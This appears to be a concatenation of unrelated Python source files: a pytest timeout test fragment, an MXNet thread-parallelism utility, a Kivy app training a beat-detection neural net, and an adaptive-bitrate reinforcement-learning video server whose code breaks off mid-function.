@pytest.mark.parametrize('protocol', ['grpc', 'http', 'websocket'])
def test_headfull_exec_timeout(port_generator, protocol):
flow_kwargs = {'timeout_send': 1, 'protocol': protocol}
add_kwargs = {'uses': SlowExecutor, 'shards': 2}
# we have to do this in a new process because otherwise grpc will be sad and everything will crash :(
p = multiprocessing.Process(target=_test_error, args=(flow_kwargs, add_kwargs))
p.start()
p.join()
assert (
p.exitcode == 0
) # if exitcode != 0 then test in other process did not pass and this should fail
|
parallel.py
|
# coding: utf-8
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Utility functions for parallel processing."""
import threading
try:
import Queue as queue
except ImportError:
import queue
__all__ = ['Parallelizable', 'Parallel']
class Parallelizable(object):
"""Base class for parallelizable unit of work, which can be invoked by `Parallel`.
The subclass must implement the `forward_backward` method, and be used
together with `Parallel`. For example::
class ParallelNet(Parallelizable):
def __init__(self):
self._net = Model()
self._loss = gluon.loss.SoftmaxCrossEntropyLoss()
def forward_backward(self, x):
data, label = x
with mx.autograd.record():
out = self._net(data)
loss = self._loss(out, label)
loss.backward()
return loss
net = ParallelNet()
ctx = [mx.gpu(0), mx.gpu(1)]
parallel = Parallel(len(ctx), net)
# Gluon block is initialized after forwarding the first batch
initialized = False
for batch in batches:
for x in gluon.utils.split_and_load(batch, ctx):
parallel.put(x)
losses = [parallel.get() for _ in ctx]
trainer.step()
"""
def forward_backward(self, x):
""" Forward and backward computation. """
raise NotImplementedError()
class Parallel(object):
"""Class for parallel processing with `Parallelizable`s. It invokes a
`Parallelizable` with multiple Python threads. For example::
class ParallelNet(Parallelizable):
def __init__(self):
self._net = Model()
self._loss = gluon.loss.SoftmaxCrossEntropyLoss()
def forward_backward(self, x):
data, label = x
mx.autograd.record():
out = self._net(data)
loss = self._loss(out, label)
loss.backward()
return loss
net = ParallelNet()
ctx = [mx.gpu(0), mx.gpu(1)]
parallel = Parallel(len(ctx), net)
for batch in batches:
for x in gluon.utils.split_and_load(batch, ctx):
parallel.put(x)
losses = [parallel.get() for _ in ctx]
trainer.step()
Parameters
----------
num_workers : int
Number of worker threads. If set to 0, the main thread is used as the worker for
debugging purpose.
parallelizable :
Parallelizable net whose `forward` and `backward` methods are invoked
by multiple worker threads.
serial_init : bool, default True
Execute the first `num_workers` inputs in main thread, so that the `Block`
used in `parallizable` is initialized serially. Initialize a `Block` with
multiple threads may cause unexpected behavior.
"""
class _StopSignal(object):
"""Internal class to signal stop. """
def __init__(self, msg):
self._msg = msg
def __init__(self, num_workers, parallizable, serial_init=True):
self._in_queue = queue.Queue(-1)
self._out_queue = queue.Queue(-1)
self._num_workers = num_workers
self._threads = []
self._parallizable = parallizable
self._num_serial = num_workers if serial_init else 0
def _worker(in_queue, out_queue, parallel):
while True:
x = in_queue.get()
if isinstance(x, Parallel._StopSignal):
return
out = parallel.forward_backward(x)
out_queue.put(out)
arg = (self._in_queue, self._out_queue, self._parallizable)
for _ in range(num_workers):
thread = threading.Thread(target=_worker, args=arg)
self._threads.append(thread)
thread.start()
def put(self, x):
"""Assign input `x` to an available worker and invoke
`parallizable.forward_backward` with x. """
if self._num_serial > 0 or len(self._threads) == 0:
self._num_serial -= 1
out = self._parallizable.forward_backward(x)
self._out_queue.put(out)
else:
self._in_queue.put(x)
def get(self):
"""Get an output of previous `parallizable.forward_backward` calls.
This method blocks if none of previous `parallizable.forward_backward`
calls have return any result. """
return self._out_queue.get()
def __del__(self):
for thread in self._threads:
if thread.is_alive():
self._in_queue.put(self._StopSignal('stop'))
for thread in self._threads:
thread.join(10)
|
Beat.py
|
from DataBase import DataBase
from NeuralNet import NeuralNet
from threading import Thread
from kivy.app import App
from GraphViewerWidget import GraphViewerWidget
import numpy as np
from kivy.clock import Clock
from Config import Config
class Beat(App):
def __init__(self, **kwargs):
super(Beat, self).__init__(**kwargs)
self.training_set = DataBase()
self.validation_set = DataBase()
self.train_thread = Thread(target=self.train_nn)
self.should_exit = False
self.should_load = True
self.should_save = True
def build(self):
self.graph = GraphViewerWidget()
self.graph.set_graph("truth", [0, 0, 1, 1], (0, 1, 0))
self.graph.set_graph("prediction", [0, 1, 1, 0], (1, 0, 0))
self.train_thread.start()
return self.graph
def on_stop(self):
self.should_exit = True
self.train_thread.join()
def train_nn(self):
no_improvement_limit = 200
self.nn = NeuralNet()
if self.should_load: self.nn.load()
self.training_set.load_bin("C:\\BeatDetectorData\\TrainingBin\\", count=-1)
#self.validation_set.load_bin("C:\\BeatDetectorData\\ValidationBin\\", count=-1)
batch_size = 512
valid_ex, valid_lab = self.training_set.get_batch(Config.batch_size)
last_improvement = 0
best_cross_entropy = float('inf')
for i in range(10000):
# TRAIN ON ENTIRE DATA SET IN RANDOM ORDER
epoch = self.training_set.get_epoch(Config.batch_size)
for examples, labels in epoch:
if(self.should_exit): break
self.nn.train(examples, labels)
print('.', end='', flush=True)
if(self.should_exit): break
print("")
# VALIDATE ON RANDOM SUBSET
cross_entropy = self.nn.validate(valid_ex, valid_lab)
print("Epoch: {}, Cross_entropy: {}".format(i, cross_entropy))
if(cross_entropy < best_cross_entropy):
last_improvement = i
best_cross_entropy = cross_entropy
else:
print("WARNING, no improvement")
# EXAMINE ONE EXAMPLE FROM VALIDATION SET TO DRAW PRETTY GRAPHS
example, ground_truth = self.training_set.get_any()
prediction = self.nn.examine(example)
#prediciton_new = self.nn.single_step_examine(example)
self.gui_ex = example
ground_truth = ground_truth[:, 1]
prediction = prediction[:, 1]
xs = np.linspace(0.0, 1.0, len(prediction))
interleaved = np.zeros(len(prediction) * 2)
interleaved[0::2] = xs
interleaved[1::2] = ground_truth
self.gui_truth = interleaved.tolist()
interleaved[1::2] = prediction
self.gui_prediction = interleaved.tolist()
#interleaved[1::2] = prediciton_new
#self.gui_prediction_new = interleaved.tolist()
if self.should_save: self.nn.save()
Clock.schedule_once(self.update_gui)
if(i - last_improvement >= no_improvement_limit):
print("No improvement for last {}, aborting", no_improvement_limit)
break
print("train done")
self.nn.export_to_protobuffer("./export")
def update_gui(self, dt):
self.graph.set_spectrogram(self.gui_ex)
self.graph.set_graph("truth", self.gui_truth, (0, 1, 0))
self.graph.set_graph("prediction", self.gui_prediction, (1, 0, 0))
#self.graph.set_graph("prediction_new", self.gui_prediction_new, (0, 0, 1))
if __name__ == '__main__':
app = Beat()
app.should_load = False
app.should_save = True
app.run()
|
myRL_1_server_no_training.py
|
#!/usr/bin/env python
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import SocketServer
import base64
import urllib
import sys
import os
import json
os.environ['CUDA_VISIBLE_DEVICES']=''
import numpy as np
import tensorflow as tf
import time
import a3c
import multiprocessing
import time
import copy
import socket
import fcntl
import matplotlib.pyplot as plt
S_INFO = 6 # bit_rate, buffer_size, rebuffering_time, bandwidth_measurement, chunk_til_video_end
S_LEN = 8 # take how many frames in the past
A_DIM = 6
VIDEO_BIT_RATE = [300,750,1200,1850,2850,4300] # Kbps
BITRATE_REWARD = [1, 2, 3, 12, 15, 20]
BITRATE_REWARD_MAP = {0: 0, 300: 1, 750: 2, 1200: 3, 1850: 12, 2850: 15, 4300: 20}
M_IN_K = 1000.0
BUFFER_NORM_FACTOR = 10.0
CHUNK_TIL_VIDEO_END_CAP = 48.0
TOTAL_VIDEO_CHUNKS = 448
DEFAULT_QUALITY = 0 # default video quality without agent
REBUF_PENALTY = 4.3 # 1 sec rebuffering -> this number of Mbps
SMOOTH_PENALTY = 1
ACTOR_LR_RATE = 0.0001
CRITIC_LR_RATE = 0.001
TRAIN_SEQ_LEN = 100 # take as a train batch
MODEL_SAVE_INTERVAL = 100
RANDOM_SEED = 42
RAND_RANGE = 1000
SUMMARY_DIR = './results'
LOG_FILE = './results/log'
# in format of time_stamp bit_rate buffer_size rebuffer_time video_chunk_size download_time reward
# NN_MODEL = None
NN_MODEL = '../rl_server/results/pretrain_linear_reward.ckpt'
################################
#multiprocessing share variables
manager=multiprocessing.Manager()
Que1=manager.list()
Que2=manager.list()
Dict1=manager.dict()
Dict2=manager.dict()
begin_time=time.time()
QueOnline=manager.list()
DictOnline={}#remember last quality for each IP
MultiClientState={}# format:{"IP":[(int)heartbeat_time_not_request_time,(int)quality]}
################################
# video chunk sizes
size_video1=[1756806,3091206,2210154,1845731,1817275,2069902,2117640,2061264,2237179,2132441,2044975,3789197,3250223,2487213,2149619,1765477,
2505293,2673223,2084351,2069989,1855189,2478422,2580412,2065841,2585352,1351167,1398486,1725385,2897186,4738096,1670320,1756062,
3048206,4866144,1843384,1584205,1884317,1858789,1038538,798577,2117675,2528940,1398909,3205655,2983891,2201743,2366969,2553838,
1501437,1267022,1644497,1367567,1203298,3427696,1968656,3096706,2066317,2634682,1694746,1434945,3173242,1693021,1682424,2113373,
3103217,2462552,2256905,2226073,1980055,2037901,2470135,2128194,2434345,1714265,1330462,2102803,1015863,865084,1634635,1229781,
1227461,1383375,1572941,1624467,1260343,2100804,1782111,3028204,1845902,1283138,1529032,1782594,1613129,1621860,1702228,1935782,
1908470,1820040,1542276,2025509,1672002,1681633,3771816,5057431,3537995,2803543,3831917,2709325,3627028,2349666,2466424,2215131,
2249004,1704399,1689433,1362005,1565350,2242939,2378241,2021904,2019269,1054954,2328052,2211591,2104177,2280895,1991117,1857563,
2209717,1711273,1293338,1289551,1976534,2284536,1925431,2869117,2469558,1435620,1240014,1811217,2988838,2552354,2365918,2065200,
2555376,1779921,2281000,2856816,2252510,1331370,1565606,1548717,3429310,1957226,1744946,1736383,2170169,2128049,2573352,2262965,
2877128,2632416,2110319,2309152,2087447,2303868,3110829,4470951,4276187,2646215,2596715,1701057,2932345,2622505,2362883,2360631,
3172401,3599259,2951048,1968506,2345232,1739989,1303134,1273197,1463247,1841675,2594747,3307177,1289034,2849319,2067334,1658999,
1451249,2074198,1510216,2665640,2975156,1903333,3534501,4269578,4256969,4212087,983135,527732,391690,1403108,1438881,1452557,
1917879,1613934,1871217,1188694,2512090,2858958,1531701,1008854,1003379,1815850,1586467,980482,1439500,2289989,2449550,3404941,
3365845,2830877,4573090,2648680,4028108,5273438,3649905,3386154,2446726,2965108,2245612,1832510,2071735,1755973,2019058,1360561,
1039489,1894295,1999107,1666014,2242594,1746466,2870885,2284279,1714119,2282746,1999381,2436148,1828361,2833893,2132959,1585105,
2275927,2131090,2951419,2197713,2049883,1657043,2195265,2978021,2007940,1712613,1729774,1533013,3056849,3034214,3327704,3120601,
2265234,1983515,2468537,2171814,1750435,1885298,2056222,2409637,1384308,1073859,1993041,2524543,2684433,2749667,1487433,2299203,
1711371,1882897,1979814,2600016,2829907,2024223,2435121,1745680,1733204,2311748,2360093,2962846,2530685,2333345,2573975,2688803,
1674837,2328829,2654846,2177220,1983637,1826992,1554600,1742047,1015182,1327517,1392909,1997961,2777906,2151277,1385355,1841831,
2576036,2248077,1670266,1921688,2513568,2592109,1866077,2254994,3076104,2892882,2637278,2258700,1223635,905654,900966,532695,
678430,1684441,1272715,1174559,1071726,1261171,1574531,1726304,1393375,1612197,1577541,1178594,1331352,1471475,1258708,1417142,
1337069,1753784,3098761,1712958,1487216,1749591,2094655,1655374,1838915,1632130,4455112,1103313,4325538,4260027,3363232,1966800,
2387229,2734086,2389536,2457011,2795839,2917015,2516264,2127460,2593348,3241121,3966814,3003788,1984507,2589085,2196063,1610600,
1378770,2396778,1976157,1717434,669393,1027820,1375132,1464032,1326640,1729066,1534541,1787945,2596315,3393474,2786962,3161567,
2753054,2801599,3086005,2440861,3156653,4016406,3399126,3785131,4186971,3408842,2612351,2792930,2184320,1364863,1291497,958698,
1640227,1815859,1795500,2069010,2016002,1406199,1373710,1718790,980021,862871,990244,1247321,1934872,1727416,1281950,1283997,
2167162,1437622,911988,1208836,1855819,1746139,2142901,3077141,2097075,1667617,2375729,1176383,1534788,2019092,1649060,1119606,
2066820]
size_video2=[1248166,1909948,1437354,1206293,1202036,1374260,1394562,1352039,1499553,1420399,1360662,2352325,2206383,1618768,
1455386,1204706,1713574,1864652,1448970,1398569,1293903,1662378,1778570,1405415,1767145,754576,789631,1047145,1830919,3283497,
1110502,1143921,2082236,3252018,1219923,1071692,1295207,1266141,656576,503078,1354183,1699087,927720,2208172,2011759,1494987,
1602807,1716281,996382,808047,975928,884332,755695,2258444,1301747,2091230,1441438,1791927,1142314,948784,2118602,1134808,1088077,
1419506,2094634,1666971,1573121,1445975,1315146,1393944,1676874,1438847,1587400,1082750,855365,1309596,616101,522811,1009092,
755328,744447,856311,990560,994122,741287,1350804,1149553,2095051,1184299,762583,968586,1179001,1003173,998496,1057590,1243591,
1237504,1117387,937314,1261624,1166183,1171457,2696482,3460711,2432287,1831251,2639863,1888769,2576440,1610171,1708230,1492094,
1538209,1132001,1123038,874553,1004636,1426699,1544177,1349606,1360880,645082,1354293,1398892,1451433,1504901,1328553,1263252,
1509891,1153670,855640,864167,1392355,1511324,1301036,1948238,1647259,955411,816968,1185012,2007860,1648783,1522896,1335718,
1707248,1085428,1457959,1994052,1475727,828972,948348,933982,2382507,1225258,1097507,1118835,1448416,1390061,1695141,1496810,
1954410,1774003,1366911,1524592,1368957,1501570,2095420,3114760,2838416,1502515,1694876,1053663,2100929,1903225,1667629,1663218,
2248474,2551140,2051397,1347603,1626107,1164880,871909,857484,973494,1264289,1741906,2304449,845899,1950152,1361535,1096620,
956379,1374366,979791,1713882,1980346,1253742,2331705,2782848,2771738,2807548,644361,352430,247261,924748,983983,978337,1273457,
1072491,1233180,753303,1719760,1976297,1020941,643472,632199,1212648,1033471,622503,954344,1418860,1581120,2280953,2273723,
1722839,3004290,1786110,2762113,3508086,2471169,2290623,1631933,2022588,1501694,1221686,1392053,1162530,1350142,916630,692591,
1272848,1376995,1130650,1511110,1188451,1956043,1553905,1190117,1536041,1334153,1620445,1229638,1904189,1437879,1043343,1484736,
1389038,1962114,1379569,1348907,1083199,1464620,1986660,1331590,1086919,1129684,1020726,2049670,2077307,2244912,2092287,1502555,
1329093,1638317,1432601,1186820,1259056,1378272,1592067,894118,702494,1328338,1707818,1858005,1814721,965118,1491287,1130946,
1245095,1297373,1761282,1887826,1337368,1614799,1121034,1145238,1497043,1606601,2025110,1710529,1583480,1723662,1810776,1113208,
1547386,1774950,1421925,1206322,1187183,1004007,1147471,676151,894621,880733,1266385,1848743,1457129,887321,1185256,1683346,
1454053,1091702,1298560,1702106,1712364,1162421,1518078,2105991,1963481,1783520,1462072,721990,579786,589643,344866,427515,
1117244,806288,741042,675112,787869,1011434,1126209,885267,1055611,1018506,773227,870077,912214,776772,883886,862865,1150468,
2067548,1099289,945530,1150026,1362064,1050127,1197301,1075450,2836687,702922,2875327,2778004,2245324,1287876,1575207,1779274,
1563888,1703575,1879597,1981220,1706876,1336949,1679947,2160617,2693480,2009306,1332161,1758489,1457012,1054975,926778,1589787,
1315164,1139932,406770,664625,936523,928176,835472,1167407,994739,1185573,1740000,2319760,1837859,2103152,1854032,1873751,2125146,
1614715,2116308,2777412,2292582,2515009,2837060,2395144,1790486,1913686,1448776,902340,828891,617586,1081453,1195033,1179707,
1339413,1300244,935908,880962,1098413,618451,537171,620261,773863,1240249,1093356,802481,790748,1415323,837047,545014,773276,
1225405,1133886,1437142,2045825,1351366,1027020,1495764,704275,989618,1287214,1087634,718747,1318691]
size_video3=[846285,1168830,924155,782361,776921,896171,904410,867529,987852,931970,884019,1388977,1386547,1061921,985293,802234,
1169255,1286193,995130,938950,889120,1097258,1199443,945496,1179962,430164,436726,624519,1113671,2138958,731588,732163,1371730,
2110792,788301,712212,865112,846544,419881,323168,854227,1103578,603737,1462476,1328702,995325,1062304,1130531,658362,515203,
564263,576357,481669,1439148,831514,1345162,986175,1206557,761735,621067,1371358,739751,691765,948480,1381127,1093177,1075045,
921199,858138,939164,1113522,952278,1002220,678313,545154,794368,368560,322602,627633,465516,454419,527661,617205,601121,418400,
838302,720424,1421671,743692,444613,590983,767637,605102,586040,629895,773906,770305,679673,553179,767895,798336,717269,1749944,
2232941,1630935,1191422,1750938,1335785,1831757,1108036,1190875,1006044,1040709,746704,736186,559337,646623,884342,996032,902282,
898520,388061,706020,837590,997771,984903,869629,841845,1003621,765322,549112,567129,962434,983686,849944,1297068,1068550,630926,
534534,753751,1297143,1033674,972729,860044,1146757,643290,916479,1371688,950221,503853,565079,558122,1579179,764904,684818,714375,
958026,897292,1095530,976392,1284670,1157384,849960,983202,885117,949242,1378747,2093615,1794015,892920,1070196,636000,1427417,
1358293,1161687,1148764,1556485,1755196,1391857,901239,1101441,767029,575457,571960,640246,852139,1153342,1551623,552146,1303983,
884697,728329,631483,890909,629541,1057592,1264644,812359,1495774,1802682,1794299,1809999,421592,234510,162002,598631,660455,
650412,831883,704816,796782,469916,1141450,1332339,673944,405808,393579,790772,668101,391316,620897,855778,987162,1437210,1494618,
1000189,1977624,1160710,1853267,2272158,1620476,1512714,1065616,1349832,985649,800298,916009,747151,878787,611733,458891,824552,
936781,763908,1005463,805397,1309198,1027202,824776,1018133,878999,1059264,816116,1245755,950480,675165,934743,881605,1262539,
836769,868241,689535,960324,1290799,875221,677750,719309,673009,1332185,1381609,1467929,1364835,972063,879023,1062308,925128,
796868,822789,917077,1038227,572879,460030,870647,1135715,1267450,1170787,608866,932475,718075,794316,835131,1173614,1226376,
873792,1039123,698256,744176,962960,1076340,1357311,1134278,1063750,1129502,1193512,731147,1008405,1172782,916351,714909,746975,
628955,733798,452985,599131,547008,788141,1187992,947166,556402,745185,1072325,919245,703608,867170,1130427,1110818,720520,1007762,
1397415,1311440,1185457,919927,415043,381670,384138,221070,272611,721164,508382,463087,418721,476494,636457,721220,555097,676089,
633209,496792,565895,553631,472079,531680,549381,738800,1333841,682133,579828,733952,859037,656064,756593,693793,1828137,431863,
1810452,1836670,1447052,837477,1007940,1130632,997037,1164277,1231827,1316193,1135411,817342,1051188,1391898,1762282,1306967,
877949,1172156,944666,677181,614653,1029902,861520,751279,251924,434194,637408,585673,517743,779377,624265,767662,1141932,1552512,
1182714,1350835,1216575,1221492,1437167,1047801,1352884,1866550,1498852,1594916,1933364,1666636,1216493,1299406,946556,587152,
523357,398282,698490,768546,747186,839672,816283,609526,551500,685818,385510,332617,384081,472836,784876,681576,495325,478054,
910864,486727,327909,490384,787676,714464,934579,1322102,836378,608941,898288,419176,631361,777189,710660,463377,848825]
size_video4=[547035,706404,596043,524098,504228,582524,590858,552807,649725,609806,581924,835167,856359,720885,648993,549888,798544,
890208,680375,621228,612247,714936,801526,636640,781633,258480,256981,381833,668878,1316285,483083,470324,887319,1346096,488576,
476883,574255,560775,275294,213942,544631,721930,394905,956401,866807,668112,707053,752293,439005,328990,332676,381240,315599,
905000,536920,856841,676222,814761,511744,406110,872426,478738,441067,638082,902857,705191,735017,597647,564153,640146,744700,
634426,622405,429916,348023,473333,223233,207060,398798,297699,289124,338019,386894,376068,247323,529278,458771,954008,469848,
268451,367008,510493,384351,336696,365757,469230,466878,397890,306208,392038,480889,427503,1061331,1462570,1107397,788212,1201905,
958934,1296354,764232,834022,684159,703462,494688,476757,358278,421053,547982,651712,605673,604769,247633,362988,500301,679289,
636811,569262,554524,657393,500344,353603,370888,654913,640820,555403,854536,682544,425652,353977,482904,831613,646249,623250,
570778,781138,395629,591756,919672,608636,315279,348908,341251,1028395,493213,433388,461614,633669,582445,710571,635445,829185,
740760,520948,625161,572429,587024,885619,1366909,1096009,549068,693014,384613,967739,961765,802806,786390,1063204,1193221,938432,
594814,738128,514183,385394,386211,419937,569630,759702,1035614,363332,867267,584199,495296,418710,579747,407271,643695,793432,
532780,953519,1181184,1173164,1150240,278260,158326,109243,391560,447495,432372,541903,462974,514903,297437,746687,889772,446977,
261064,245091,514842,433432,248997,401709,510992,623671,875583,954252,565854,1282428,760254,1230934,1471145,1041466,1007408,
700685,908906,647372,531923,604648,480567,571680,415481,311725,528791,648577,526915,676767,544984,877852,681274,584479,682400,
587249,697584,541523,819236,635454,439248,575534,558134,795960,507237,560309,435884,630696,842280,584377,418701,452008,447495,
855620,910486,955619,874290,634816,588917,688253,601008,545601,546370,622967,696809,377403,307085,582646,767567,881993,759744,
380057,569142,450995,500151,533009,787180,796757,579408,665424,428991,486141,634709,724968,910350,755342,723301,744499,791097,
486696,650661,775896,589564,417632,460207,386577,461058,309090,401728,335814,488570,758867,599018,354581,449831,677583,583268,
452635,579431,752699,725899,457825,661835,924337,879308,792148,572914,236078,252664,248583,143285,173576,464535,323435,290071,
259483,286196,396866,459208,346403,429612,379429,317461,373328,334657,285622,316216,347387,474325,846736,421261,358587,460670,
540837,418151,473605,443747,1142146,266099,1139106,1226865,912006,544488,637168,726559,633507,783324,803464,874546,749552,490660,
644883,880869,1134430,839081,575502,778336,608858,437231,411106,666015,563343,500243,160495,290749,441946,380307,327141,528851,
386873,499151,742431,1004036,756402,854695,798836,797035,965829,672367,837390,1234139,962167,972983,1314591,1183313,847271,900132,
623507,383196,331639,259707,448397,491216,470078,535948,506772,404948,343057,429095,241972,208979,237532,289286,502020,428997,
308660,291778,588501,298147,204497,313212,504692,445722,619353,831848,511452,357941,535866,252048,403999,477594,454970,301303,551953]
size_video5=[323113,418441,382004,337817,318822,366200,363903,346976,404249,383861,369141,500281,492772,467460,412406,364336,530546,
595068,453373,400416,406242,447605,508492,416723,492336,153985,149450,221825,389137,790219,302059,288733,540456,825815,285915,
304614,354511,356853,174974,139405,344879,446520,249322,594647,540016,434577,456950,491623,284629,206793,194787,245465,201172,
543139,328951,533104,446793,532154,333255,259306,513006,294784,273182,414589,562032,426081,491024,375053,356030,434816,485000,
415484,363173,267232,217152,268349,130234,129844,244414,183197,181289,211852,230048,232458,147458,323339,286466,621150,292710,
157388,224852,330448,244658,189794,208443,272864,272767,219585,160716,199810,281265,234643,623111,905443,715137,496016,757193,
653100,866715,509267,565709,439095,458179,317013,299723,220237,265702,326004,406891,398108,396428,161148,189747,289152,438311,
391808,350823,342642,404291,312421,215746,231048,419638,401633,350467,540680,413555,274948,226952,298374,504645,399332,385815,
376112,518000,240102,380381,592007,379115,193082,217973,203101,629581,312102,266984,289355,406154,364723,444534,405512,503590,
445920,301669,381944,350196,336701,533864,849909,638562,325653,440403,227952,636997,657734,525502,518535,689114,782104,610917,
376978,476526,340219,251135,252753,267845,366877,470621,673027,231795,555250,369340,329086,269267,364173,255834,373785,469492,
336207,598436,747522,744086,688734,182335,102883,71090,251738,294267,277818,338245,291138,317642,182073,467537,572660,290618,
163813,145742,323299,269998,151414,247136,299386,379185,511734,583799,309771,794744,474007,777870,916062,639704,663002,444759,
596148,410568,350269,389119,296238,363553,277452,211307,324543,445667,365955,459618,364370,580715,438804,412688,454548,384954,
449872,351636,532810,418362,278056,331408,337389,468421,287027,339677,265929,405248,543069,387402,240196,265294,288498,506694,
574841,596509,526249,403785,389295,440901,377555,376321,360924,424678,470015,246729,206103,391925,514724,604960,481393,227540,
320553,265336,292954,332903,526009,509974,379518,402580,247420,307887,399296,490999,599427,493224,485382,474936,511692,327348,
403054,509642,370452,220414,268766,223824,273431,210187,260215,194459,282781,458374,361910,222321,254376,398627,353268,277424,
373952,485170,458908,283968,415847,594244,581598,513771,336212,123056,159415,152039,84419,96964,296357,197550,174412,150205,
163490,234384,276420,206155,251134,207262,189865,234699,190492,162133,172192,208515,294919,506806,243271,208423,266189,317494,
252397,272579,266038,626921,160573,687288,805076,516668,334312,382256,432601,382803,509989,497589,559731,472280,271315,372954,
517170,690202,505692,358051,497198,379108,274271,264254,417412,356246,329139,100180,192502,302659,248706,201499,350511,223655,
308401,454270,637270,464928,511545,498959,503850,626394,410515,466441,761200,580059,554024,831652,823388,590577,625131,404481,
242549,205265,168423,277268,309949,278503,325049,292610,262838,201999,257126,143254,124497,137758,167697,308527,256226,182915,
168765,363172,179420,124656,188561,300983,262333,396335,493415,295359,207622,306053,145571,246429,285851,275563,186508,346649]
size_video6=[122566,141690,156437,151455,131958,141687,134848,143568,169611,155749,144962,187567,189741,191607,169931,160854,236280,
279955,203736,174786,193874,187167,207081,196253,203820,58306,52004,70463,114188,248094,120126,105738,187819,288450,107224,132126,
132775,150099,72040,63120,142264,179063,113063,237672,222641,210179,206024,226841,125166,86270,76277,111752,86103,186977,124488,
195494,209856,232665,151864,114023,181418,107522,111914,191996,231947,145572,228523,165245,154746,217987,232697,199480,132247,
114355,92243,101533,44432,46959,92051,64667,69881,82966,70706,91967,52126,115033,106804,257487,110329,52198,86248,137809,98071,
59563,67579,89812,87619,65049,51508,66553,97090,69339,218786,350602,282395,196655,294150,274147,350502,229885,264751,188592,194004,
138597,129254,90055,113934,119577,163598,176947,176958,64953,63686,94317,174842,133878,119038,116797,143402,114567,79187,85619,
158887,158149,136588,211814,149475,111228,90166,110685,182666,164383,153601,193728,240841,89363,172541,249048,155912,72714,96738,
76146,210967,138516,104483,112952,166011,143486,173754,163990,184907,157542,102142,138713,132187,103266,186551,302474,233690,114527,
183684,86990,275527,303484,247110,243197,306068,333494,259092,161551,219694,163689,115479,115867,110157,165717,206413,316094,106605,
258595,167706,161871,126251,164223,106360,140197,171683,142022,226802,274115,317194,289925,80931,38396,28340,124143,139033,128434,
145168,122302,127194,68553,208520,246036,119157,62046,49114,123744,104524,56056,81724,107806,129717,178197,219082,87764,309996,
175234,291302,381763,260114,311747,197184,285496,184984,171407,180922,127859,167708,142347,108401,127627,229023,194597,231589,
188967,293808,207290,225385,222372,182989,208632,165647,262519,198122,119059,136057,151258,207737,126195,142675,116189,196934,
273298,169687,80087,89952,116953,203808,258544,276055,251654,191358,176143,185613,174725,183381,183890,208329,222059,115871,103659,
194619,263618,323870,232819,101175,148358,120409,137639,169775,286516,266060,186239,185178,111048,131835,191865,248460,308506,
263337,268120,252697,279984,174154,193877,250368,165544,97614,128553,106663,133692,98249,131557,84157,120094,191725,157144,106115,
103896,189100,153325,105096,185534,243798,242423,135512,204760,313395,292357,286477,158682,36035,72722,58693,21160,29201,149424,
93095,73211,52395,60533,84569,100012,78060,95461,63814,66318,90387,64036,46982,48426,64363,108625,183411,70708,64343,82518,105266,
82540,70162,71644,64605,51629,207652,169915,122208,106258,133986,162789,140802,190933,160253,206255,174223,70660,113933,173128,
261541,173884,115544,179952,131746,92096,84877,151907,131972,127129,27791,55798,115167,97179,63504,113963,41194,72340,149359,
210948,145277,142456,148052,171092,235134,102985,129884,278803,214629,183098,306658,352088,282790,309863,185129,100329,81350,
64536,120000,135855,104350,136764,97760,99442,67417,84531,36782,30662,33807,40182,96727,72553,43191,38019,107349,45983,30115,
45931,84315,65096,123915,152798,77492,43261,76665,36196,69589,62195,61628,33154,80528]
def get_chunk_size(quality, index):
if ( index < 0 or index > 448 ):
return 0
# note that the quality and video labels are inverted (i.e., quality 8 is highest and this pertains to video1)
sizes = {5: size_video1[index], 4: size_video2[index], 3: size_video3[index], 2: size_video4[index], 1: size_video5[index], 0: size_video6[index]}
return sizes[quality]
class my_socketserver(SocketServer.ThreadingTCPServer):
allow_reuse_address=True
daemon_threads=True
def __init__(self,server_address,RequestHandlerClass):
SocketServer.ThreadingTCPServer.__init__(self,server_address,RequestHandlerClass)
def make_request_handler(input_dict):
class Request_Handler(BaseHTTPRequestHandler):
def __init__(self, *args, **kwargs):
self.input_dict = input_dict
self.sess = input_dict['sess']
self.log_file = input_dict['log_file']
self.actor = input_dict['actor']
self.critic = input_dict['critic']
self.saver = input_dict['saver']
self.s_batch = input_dict['s_batch']
self.a_batch = input_dict['a_batch']
self.r_batch = input_dict['r_batch']
BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
def do_POST(self):
content_length = int(self.headers['Content-Length'])
post_data = json.loads(self.rfile.read(content_length))
#print post_data
if ( 'pastThroughput' in post_data ):
# @Hongzi: this is just the summary of throughput/quality at the end of the load
# so we don't want to use this information to send back a new quality
print "Summary: ", post_data
elif('heartbeat' in post_data):
if self.client_address[0] not in Que1:
Que1.append(self.client_address[0])
#print('Que1',Que1[:])
#print self.client_address
send_data="receive hb"
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
self.send_header('Content-Length', len(send_data))
self.send_header('Access-Control-Allow-Origin', "*")
self.end_headers()
self.wfile.write(send_data)
else:
########## Algorithm write here! Now you get all info! #########
global begin_time
t = float(time.time() - begin_time)
q = int(post_data['lastquality'])
global Dict1,Dict2
if self.client_address[0] in Dict1.keys():
tmp=Dict1[self.client_address[0]]
tmp.append(t)
Dict1[self.client_address[0]]=tmp
tmp=Dict2[self.client_address[0]]
tmp.append(q)
Dict2[self.client_address[0]]=tmp
else:
Dict1[self.client_address[0]]=[t]
Dict2[self.client_address[0]]=[q]
#print(Dict1[self.client_address[0]],Dict2[self.client_address[0]])
global DictOnline,QueOnline
for k in DictOnline:
if k not in QueOnline[:]:
DictOnline.pop(k)
DictOnline[self.client_address[0]]=q
# option 1. reward for just quality
# reward = post_data['lastquality']
# option 2. combine reward for quality and rebuffer time
# tune up the knob on rebuf to prevent it more
# reward = post_data['lastquality'] - 0.1 * (post_data['RebufferTime'] - self.input_dict['last_total_rebuf'])
# option 3. give a fixed penalty if video is stalled
# this can reduce the variance in reward signal
# reward = post_data['lastquality'] - 10 * ((post_data['RebufferTime'] - self.input_dict['last_total_rebuf']) > 0)
# option 4. use the metric in SIGCOMM MPC paper
rebuffer_time = float(post_data['RebufferTime'] -self.input_dict['last_total_rebuf'])
# --linear reward--
